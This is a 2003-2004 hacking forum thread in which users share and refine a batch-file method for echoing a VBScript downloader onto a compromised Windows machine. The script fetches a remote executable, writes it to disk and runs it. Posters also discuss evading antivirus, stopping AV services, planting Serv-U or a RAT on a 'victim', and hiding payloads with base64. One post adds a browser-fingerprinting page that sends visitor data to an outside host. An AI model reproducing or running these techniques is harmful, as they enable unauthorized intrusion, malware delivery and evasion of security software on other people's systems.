hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > System Security > Windows Systems
Pages: 1, 2, 3, 4
GhostCow
Dec 18 2003, 04:30 PM
its too simple to kill firewalls once you can get files into the machine...
thanks for the bitchin code! ph34r.gif
realloader
Dec 18 2003, 05:55 PM
with this VBS scrip from boshcash i can upload serv-u to Taget IP and start it.
But i can not connect to my STRO.
How can i connect to my stro? can some one help me?
nipagini
Dec 18 2003, 06:23 PM
hey cool, very nice, exactly what i was looking for!!
iLLuSioN
Dec 19 2003, 03:39 AM
nice thanks alot !
rastis_monkey
Dec 19 2003, 05:03 AM
ty
thegeek
Dec 20 2003, 08:35 PM
Thanks a lot, but I discovered why it at first would not work for me.
You NEED a space before >/>>

CODE
echo Dim DataBin >dl.vbs
echo Dim HTTPGET >>dl.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>dl.vbs
echo HTTPGET.Open "GET", "http://www.microsoft.com/ms.exe", False>>dl.vbs
echo HTTPGET.Send >>dl.vbs
echo DataBin = HTTPGET.ResponseBody >>dl.vbs
echo Const adTypeBinary=1 >>dl.vbs
echo Const adSaveCreateOverWrite=2 >>dl.vbs
echo Dim test1 >>dl.vbs
echo Set test1 = CreateObject("ADODB.Stream") >>dl.vbs
echo test1.Type = adTypeBinary >>dl.vbs
echo test1.Open >>dl.vbs
echo test1.Write DataBin >>dl.vbs
echo test1.SaveToFile "file.exe", adSaveCreateOverWrite >>dl.vbs
dl.vbs
file.exe
Fareway
Dec 20 2003, 11:05 PM
wow dude that's new to me - looks very cool! thx
Buluemoon
Dec 21 2003, 05:14 AM
Thanks boshcash, I am going to test this on a friends box and see what kind of results we get, I believe he runs Kapersky AV, didnt notice anyone mention if Kapersky picks it up.
will be great to have a working alternative to ftp and tftp.
boshcash
Dec 25 2003, 08:41 PM
mm , i need u guys to try to use the write to file ">" using other thing than echo command , maybe we can create a file without any restrictions .. i still cant put the < and> signs at the text ..
eXtErNaL
Dec 25 2003, 09:17 PM
this realy helped rolleyes.gif

my regards
zero-maitimax
Dec 26 2003, 12:31 AM
i think the problem is with the exe file....

i have a idea if you make a exe file in mime (base64) file
and put it one a page..
now download the page extracted the file and open it..


or trai to change the .exe to .pif maybe it works then..
capster
Dec 26 2003, 06:14 AM
pimp way to download a file remotely. ftp has never given me a problem but this is nice smile.gif
rush
Jan 1 2004, 08:36 PM
why not use wget?
With wget.exe you can download files from http/ftp/etc..
So you can do the same, no?
Jackson
Jan 1 2004, 09:24 PM
kewl i will test that thx laugh.gif
headbanger
Jan 1 2004, 11:24 PM
nice share, thanks.. ill try it soon
zero-maitimax
Jan 2 2004, 12:39 AM
QUOTE (rush @ Jan 1 2004, 08:36 PM)
why not use wget?
With wget.exe you can download files from http/ftp/etc..
So you can do the same, no?

what is that for a program?

is it a externel program or a internel program..?
boshcash
Jan 2 2004, 01:26 PM
wget isnt installed with windows by the way , its not found except if someone already got it ..
skorpio
Jan 2 2004, 06:55 PM
fantastic!!!!!
but if you wanted to upload more than file as I modify the code?
Thanks


Bye wink.gif
boshcash
Jan 2 2004, 07:10 PM
yes of course change the code or make the first upload to be a web downloader like dhttp or a RAT with upload feature
NeBo_K
Jan 2 2004, 08:55 PM
Thanks a lot seems very useful.
UltraCool
Jan 3 2004, 12:58 AM
Well this could be very usefull, thank you very much!

UC
Andy
Jan 3 2004, 01:10 AM
smile.gif great tip. gonna have to try this out smile.gif
The Storm
Jan 9 2004, 02:38 PM
i`ve tried this an it wordked very good but on some systems it doesn`t work i don`t know why. But this script is a very good work!Thank you 1000 times
matrixz
Jan 10 2004, 08:40 PM
to knew the ip



CODE
<html>
<head>
<title>IP info</title>



<!-- REQUIRED BY GGScript -->
<script language="JavaScript"> var GG_js = 1.0; </script>
<script language="JavaScript1.1"> var GG_js = 1.1; </script>
<script language="JavaScript1.2"> var GG_js = 1.2; </script>
<script>
<!-- REQUIRED BY GGScript -->
var GG_sk = "Unknown";var GG_cd = 0;var GG_sw = 0;var GG_sh = 0;var GG_dr = GG_sk;var GG_du = GG_sk;var GG_an = GG_sk;var GG_av = GG_sk;var GG_np = GG_sk;var GG_ua = GG_sk;var GG_IPAddr = GG_sk;
document.URL?GG_du=document.URL:GG_du=GG_sk;document.referrer?GG_dr=document.referrer:GG_dr=GG_sk;navigator.appName?GG_an=navigator.appName:GG_an=GG_sk;navigator.appVersion?GG_av=navigator.appVersion:GG_av=GG_sk;navigator.userAgent?GG_ua=navigator.userAgent:GG_ua=GG_sk;
if(GG_js >= 1.2)
{
if(screen.width)GG_sw=screen.width;if(screen.height)GG_sh=screen.height;if(screen.colorDepth)GG_cd=screen.colorDepth;
GG_cd==2?GG_cd="4":(GG_cd==4?GG_cd="16":(GG_cd==8?GG_cd="256":(GG_cd==16?GG_cd="65K":(GG_cd==24?GG_cd="16.7M":(GG_cd==32?GG_cd="16.7M":dd=0)))));
navigator.platform?GG_np=navigator.platform:GG_np=GG_sk;
}
if(GG_js >= 1.1)
document.write("<script language=\"JavaScript1.1\" src=\"http://www.ggscript.com/GGScript/GG_IP.cgi?"+GG_du+"^"+escape(GG_an)+"^"+escape(GG_ua)+"^"+escape(GG_np)+"^"+GG_sw+"^"+GG_sh+"^"+GG_cd+"^"+escape(GG_dr)+"\"></"+"script>");
// -->
</script>
<script>
<!--
// REQUIRED BY GGScript
// do not remove, Netscape 3 needs this...
document.write(" ");
// -->
</script>

<script>
<!--
// This is for the IP Address
if(GG_IPAddr != GG_sk)
document.write("<B>Your IP address:</B><BR>"+GG_IPAddr+"<BR><BR>")

// -->




</script>



to open site if u path on it


CODE
<a href="" onmouseover="parent.location='http://your site'">do not   touch</A>




to see c: folders

CODE
<font color="#800000"><strong><input onclick="window.open('file:///C|/', 'display', 'scrollbars=1')" type="button" value=" see folders C"></strong></font>


brOmstar
Jan 13 2004, 09:50 PM
hi boshcash,

there is a way to include the "<" and ">" you only have to prefix "^"

so
CODE
echo ^<xxx^>>file.txt


results <xxx> in the file.txt

hope this helps ..

brOmstar
thegeek
Jan 13 2004, 10:05 PM
thanks a lot brOmstar biggrin.gif biggrin.gif biggrin.gif biggrin.gif biggrin.gif
boshcash
Jan 14 2004, 08:05 PM
bromster thanks anyway someone told me this hint 2 weeks ago , and its very very useful hint .. with that im planning to improve my way , i can write the way to echo a vbs file that writes an exe file without file download , so it wont be detected as virus as i think , i will also think of ways to make all text executables
LittleHacker
Jan 16 2004, 07:08 PM
Thanks All
Very nice topic
I think it worse to try it
EviL
Jan 17 2004, 02:46 PM
Thank you!!!
cock
Jan 25 2004, 10:06 PM
cool script, thanks
Dj_BaRt
Jan 26 2004, 12:42 PM
great script thx
flashb4ck
Jan 26 2004, 01:48 PM
yeah thats a really nice method so the admins think that this is a normal vb script but we did it h3h3


sorry 4 my bad english ;D


gr€€tZ flasHb4Ck

and thanx anyway
tibbar
Jan 26 2004, 11:43 PM
using vbs script is crap, nearly all AV will kill it, which apart from stopping your fun and games, will mean the "vic" is alerted to your attack.

Why not do something like use a bat2exe prog, and simply use ftp??? there's really not much to go wrong.

i think that this has been discussed in previous posts...
boshcash
Jan 27 2004, 06:15 PM
sometimes ftp.exe is deleted .. sometimes u dont have except this way ... i need to know another way to echo any text file to be converted to exe ..
mamep
Jan 28 2004, 09:51 PM
works fine wink.gif
nice one m8 biggrin.gif
very usefull
phaeton
Jan 29 2004, 04:02 AM
Could you take this, put it in a bat file -> EXE -> morphine then no detection? wink.gif
boshcash
Feb 1 2004, 08:32 AM
how could i upload morphine to victim without even sending him a program to work the file transfer ?! guys understand what i am trying to do , then comment plz ..
slb33
Feb 1 2004, 09:02 PM
vbs script doesn't get detected until I echo this line:

SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite

any way around this and still get it to work?
mr.anderson
Feb 2 2004, 05:45 PM
if you already have access to CMD you can stop mcafee.... net stop (service)
anyways very nice method thx
boshcash
Feb 2 2004, 06:01 PM
mr anderson is right , i think we can stop some of the AVs by net stopping service name , also if anyone knows any vbscript that doesnt get detected as a malicous script , and can write/download a file , that would help alot ..
Copkill
Feb 2 2004, 07:00 PM
The script works fine for me,
thx alot for this tongue.gif

i used them when ftp.exe is disabled dry.gif

net_runner
Feb 2 2004, 07:05 PM
this way really rulz.
i prove it in mi pc and works, even the .bat style.
but when i try echo it via sqlexec(gui) it say SQL Error, any advice?
globe7
Feb 2 2004, 11:40 PM
tnx dude! for usefull
ritsel
Feb 3 2004, 09:27 AM
Yeah very nice proggie dude.

Thanks for sharing
igs
Feb 4 2004, 08:29 AM
hey all.
im looking for vbs base64 decode function binary safe.
everything i found-- strips out some characters ...

if you got anything- i'd really appreciate it.
thanx.
boshcash
Feb 7 2004, 02:47 AM
igs , im looking for a better methos too , why dont u try using the mac-binhex format its better than base64 ..
Feanor
Feb 7 2004, 01:41 PM
looks very interesting...

Will try it, the problem is that i don't have an HTTP server to upload from, well i'll see what i can do.

EDIT
Kewl, on my comp it worked, now time to test it with remote comp.
Nope, couldn't upload anything on remote computer, but i'll try somewhere else too.
Pgame
Feb 8 2004, 02:35 PM
very nice post, thnx dude

I test it, it works fine on my computer, but remote it works only if you have system rights sad.gif
ThEWaTcHeR
Feb 8 2004, 06:00 PM
i have changed the code a little

now, it works very good smile.gif

CODE

echo Dim DataBin>c:\madefile.vbs
echo Dim HTTPGET>>c:\madefile.vbs
echo Set HTTPGET = CreateObject(^"^Microsoft.XMLHTTP^"^)>>c:\madefile.vbs
echo HTTPGET.Open ^"^GET^"^, ^"^http://www.mysite.de/file.exe^"^, False>>c:\madefile.vbs
echo HTTPGET.Send>>c:\madefile.vbs
echo DataBin = HTTPGET.ResponseBody>>c:\madefile.vbs
echo Const adTypeBinary=1 >>c:\madefile.vbs
echo Const adSaveCreateOverWrite=2 >>c:\madefile.vbs
echo Dim SendBinary>>c:\madefile.vbs
echo Set SendBinary = CreateObject(^"^ADODB.Stream^"^)>>c:\madefile.vbs
echo SendBinary.Type = adTypeBinary>>c:\madefile.vbs
echo SendBinary.Open>>c:\madefile.vbs
echo SendBinary.Write DataBin>>c:\madefile.vbs
echo SendBinary.SaveToFile ^"^c:\file.exe^"^, adSaveCreateOverWrite>>c:\madefile.vbs
boshcash
Feb 8 2004, 10:44 PM
the best idea is trying to hide a vbs script by encoding or writing a binary to the system by using base64 or macbinhex anyone can do that , to use it with cmdshell , for more info on mac-binhex encoding see the my.pics.zip malware's browser exploit ... (as an example)
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.